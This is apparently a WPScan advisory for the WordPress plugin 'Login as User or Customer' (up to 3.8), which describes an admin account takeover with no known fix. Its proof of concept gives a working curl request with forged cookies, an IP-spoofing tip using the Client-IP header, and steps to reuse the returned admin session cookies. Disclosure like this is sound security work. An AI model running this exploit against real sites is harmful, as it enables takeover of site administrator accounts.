WordPress Plugin Vulnerabilities
Login as User or Customer <= 3.8 - Admin Account Takeover
Description
The plugin does not prevent users to log in as any other user on the site.
Proof of Concept
1. As an admin, log in as some user. Note the user ID.
2. Run the following `curl` command, filling in the `ADMIN_ID` and the `USER_ID`:
```
curl -v https://example.com/wp-admin/admin-ajax.php -H 'Cookie: wordpress_test_cookie=WP%20Cookie%20check; wploginas_new_user_id=USER_ID; loginas_old_user_id=ADMIN_ID' -d 'action=loginas_return_admin'
```
- Note that this `curl` command has to come from the same IP address as the Admin originally used to switch to the user. The attacker may use the `Client-IP` header to fake their IP address if needed.
3. In the response, note the final `Set-Cookie` headers setting the `wordpress_sec_...` and `wordpress_logged_in_...` cookies (note that these cookies may be different if you are using `http` instead of `https`.
4. In your browser console in a logged-out tab, manually set those two cookies.
5. Visit `/wp-admin` and see that you are logged in as the admin user.
Affects Plugins
No known fix References
Classification
Type
PRIVESC
OWASP top 10
CWE
Miscellaneous
Original Researcher
Dmitrii Ignatyev
Submitter
Dmitrii Ignatyev
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-02-17 (about 2 months ago)
Added
2024-02-17 (about 2 months ago)
Last Updated
2024-02-27 (about 2 months ago)
WPScan 